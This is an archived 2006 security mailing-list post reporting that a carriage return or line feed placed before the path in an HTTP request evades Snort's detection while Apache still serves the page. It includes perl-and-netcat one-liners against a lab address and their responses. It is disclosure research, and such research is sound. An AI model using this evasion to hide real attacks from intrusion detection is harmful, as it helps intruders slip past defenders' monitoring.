Dailydave mailing list archives
Re: New Snort Bypass - Patch - Bypass of Patch
From: Sigint Consulting <info () sigint-consulting com>
Date: Sat, 03 Jun 2006 10:41:24 -0700
I performed this research while developing NFR's web signatures, and found that all web servers I tested (several years ago) handled end-of-lines using "\x0d\x0a" and "\x0a" interchangeably. If you find a web server that interprets "index.php" in the example above as an actual filename, I for one would be very interested in knowing about it. Dodge
Apache 1.3.34 (debian package) returns index.html from my request as normal even though the file name has a \x0d before it. So in Apache's case it appears that the \x0d character will not mess up the request to the webserver, atleast in this case AND still bypasses the snort check. Now obviously the \x90\x90 are going to ruin the request because no such file exists by that name so they were left out of this example, but this may mean the \x0d character would not mangle a real malicious request to apache. $ perl -e 'print "GET \x0d/index.html HTTP/1.0\n\r\n"'|nc 192.168.1.3 80 HTTP/1.1 200 OK Date: Mon, 05 Jun 2006 07:25:47 GMT Server: Apache/1.3.34 (Debian) Last-Modified: Sat, 03 Jun 2006 09:24:26 GMT ETag: "6f9d3-4d-4481554a" Accept-Ranges: bytes Content-Length: 77 Connection: close Content-Type: text/html; charset=iso-8859-1 <META HTTP-EQUIV="Refresh" CONTENT="0; URL=html/index.html">Forwarding . . . $ Further research on the snort vulnerability reveals that the \x0a character will also evade the snort preprocessor AND apache will return a valid response. (Testing \x0a before a malicious unicode string did not generate a snort alert) $ perl -e 'print "GET \x0a/index.html HTTP/1.0\n\r\n"'|nc 192.168.1.3 80 <META HTTP-EQUIV="Refresh" CONTENT="0; URL=html/index.html">Forwarding . . . $ Chris -------------------------------- www.sigint-consulting.com info () sigint-consulting com Charlotte, North Carolina Information Security Consulting --------------------------------
Current thread:
- New Snort Bypass - Patch - Bypass of Patch Sigint Consulting (Jun 02)
- Message not available
- Message not available
- Re: New Snort Bypass - Patch - Bypass of Patch Pukhraj Singh (Jun 05)
- Message not available
- Message not available
- Message not available
- Message not available
- Re: New Snort Bypass - Patch - Bypass of Patch Pukhraj Singh (Jun 05)
- Message not available
- <Possible follow-ups>
- Re: New Snort Bypass - Patch - Bypass of Patch Sigint Consulting (Jun 03)
- Re: Re: New Snort Bypass - Patch - Bypass of Patch H D Moore (Jun 05)
- Re: New Snort Bypass - Patch - Bypass of Patch Sigint Consulting (Jun 05)